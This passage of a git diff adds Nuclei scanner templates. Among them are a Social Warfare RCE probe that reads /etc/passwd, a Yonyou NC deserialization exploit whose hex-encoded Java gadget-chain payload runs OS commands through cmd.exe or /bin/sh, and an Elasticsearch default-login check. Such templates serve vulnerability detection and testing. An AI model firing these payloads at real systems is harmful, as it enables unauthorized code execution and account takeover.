- type: regex + regex: + - "BeanShell Test Servlet" + - "(?i)
(\n.*){{randstr}}"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/woocommerce-photo-reviews.yaml b/poc/remote_code_execution/woocommerce-photo-reviews.yaml
new file mode 100644
index 0000000000..06d2f7c91d
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-photo-reviews.yaml
@@ -0,0 +1,59 @@
+id: woocommerce-photo-reviews
+
+info:
+  name: >
+    WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation
+  author: topscoder
+  severity: critical
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/woocommerce-photo-reviews/"
+    google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "woocommerce-photo-reviews"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.13.2')
\ No newline at end of file
diff --git a/poc/remote_code_execution/wp-social-warfare-rce.yaml b/poc/remote_code_execution/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
+++ b/poc/remote_code_execution/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+  name: Social Warfare <= 3.5.2 - Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+  remediation: Fixed in version 3.5.3
+  reference:
+    - https://wpscan.com/vulnerability/9259
+    - https://wordpress.org/plugins/social-warfare/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/social-warfare/"
+  tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path: helpers/payloads/wp-social-warfare-rce.txt
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - 'No changes made'
+
+      - type: status
+        status:
+          - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml b/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml
new file mode 100644
index 0000000000..daeecbc08e
--- /dev/null
+++ b/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml
@@ -0,0 +1,45 @@
+id: yonyou-nc-ncmessageservlet-rce
+
+info:
+  name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
+  author: SleepingBag945
+  severity: critical
+  description: |
+    UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="用友-UFIDA-NC
+  tags: yonyou,rce,deserialization
+
+http:
+  - raw:
+      - |
+        POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data;
+        X-T0KEN-INF0: set /A 987843129+808922377
+        Accept-Encoding: gzip, deflate
+
+        {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}}
+      - |
+        POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        Content-Type: multipart/form-data;
+        X-T0KEN-INF0: expr 987843129+808922376
+        Accept-Encoding: gzip, deflate
+
+        {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}}
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")'
+          - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")'
+        condition: or
+
+# digest: 490a00463044022030de43a15056ab8c85ca3db1438ad602e9f55af19ce951b485c8b1a1400336ac02204d9b2f9df87c66b8851194b0008a4d307d7d5ca3c818274d9f75c69398651fc8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/search/elasticsearch-default-login.yaml b/poc/search/elasticsearch-default-login.yaml
new file mode 100644
index 0000000000..330f016c3d
--- /dev/null
+++ b/poc/search/elasticsearch-default-login.yaml
@@ -0,0 +1,53 @@
+id: elasticsearch-default-login
+
+info:
+  name: ElasticSearch - Default Login
+  author: Mohammad Reza Omrani | @omranisecurity
+  severity: high
+  description: |
+    Elasticsearch default credentials were discovered.
+  reference:
+    - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
+    - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
+  tags: default-login,elasticsearch
+
+http:
+  - raw:
+      - |
+        POST /internal/security/login HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
+        Referer: {{RootURL}}/login
+        Content-Type: application/json
+        kbn-version: 8.8.2
+        x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
+        Origin: {{RootURL}}
+
+        {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}
+
+    payloads:
+      username:
+        - elastic
+      password:
+        - changeme
+    attack: pitchfork
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: sid='
+          - 'kbn-license-sig:'
+        condition: and
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/social/wp-social-warfare-rce.yaml b/poc/social/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
+++ b/poc/social/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+  name: Social Warfare <= 3.5.2 - Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+  remediation: Fixed in version 3.5.3
+  reference:
+    - https://wpscan.com/vulnerability/9259
+    - https://wordpress.org/plugins/social-warfare/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/social-warfare/"
+  tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path: helpers/payloads/wp-social-warfare-rce.txt
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - 'No changes made'
+
+      - type: status
+        status:
+          - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/74cms-weixin-sqli.yaml b/poc/sql/74cms-weixin-sqli.yaml
new file mode 100644
index 0000000000..6508ef3296
--- /dev/null
+++ b/poc/sql/74cms-weixin-sqli.yaml
@@ -0,0 +1,39 @@
+id: 74cms-weixin-sqli
+
+info:
+  name: 74CMS weixin.php - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
+  reference:
+    - https://cn-sec.com/archives/25900.html
+  metadata:
+    verified: true
